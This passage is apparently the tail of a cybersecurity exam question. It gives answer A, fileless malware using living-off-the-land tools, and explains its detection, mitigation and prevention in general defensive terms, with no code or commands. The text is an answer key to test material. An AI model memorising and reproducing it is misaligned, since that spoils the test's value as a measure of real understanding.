D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

 Fileless malware operates primarily in memory and uses legitimate system tools such as PowerShell, WMI, or macros for malicious purposes. Obfuscated scripts communicating with external IPs without leaving files on disk are indicative of living-off-the-land (LotL) malware, designed to evade signature-based antivirus solutions.

Detection requires behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Indicators include abnormal script execution, outbound connections to unknown IPs, and deviations from baseline system behavior. Mitigation involves isolating affected endpoints, terminating malicious processes, analyzing scripts, and remediating systems.

Preventive controls include least privilege enforcement, application whitelisting, PowerShell logging, script block logging, execution policy enforcement, and integration with threat intelligence to block malicious domains. Defense-in-depth combining monitoring, anomaly detection, user training, and structured incident response is critical for mitigating fileless malware.

Unlike ransomware, phishing, or DDoS attacks, fileless malware operates without traditional files, leverages memory-resident execution, and uses legitimate system tools to persist, evade detection, and maintain control over affected systems.